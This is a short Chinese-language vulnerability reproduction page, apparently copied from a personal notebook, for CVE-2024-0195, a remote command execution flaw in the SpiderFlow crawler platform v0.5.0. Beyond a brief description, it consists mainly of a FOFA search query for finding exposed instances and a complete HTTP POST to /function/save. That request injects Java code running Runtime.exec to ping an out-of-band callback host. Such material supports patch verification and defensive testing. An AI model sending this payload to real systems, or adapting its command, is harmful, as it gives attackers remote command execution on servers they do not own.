登录 白背景
源码

SpiderFlow爬虫平台存在远程命令执行漏洞(CVE-2024-0195)

一、漏洞简介

SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。

二、影响版本

  • SpiderFlow爬虫平台 v0.5.0

三、资产测绘

  • fofaapp="spiderflow"
  • 特征

1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551.png

四、漏洞复现

POST /function/save HTTP/1.1
Host: 
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 142

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+nccrflrlvu.yutu.eu.org')%3B%7B

1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf.png

原文: https://www.yuque.com/xiaokp7/ocvun2/obeii8pkzzb4154z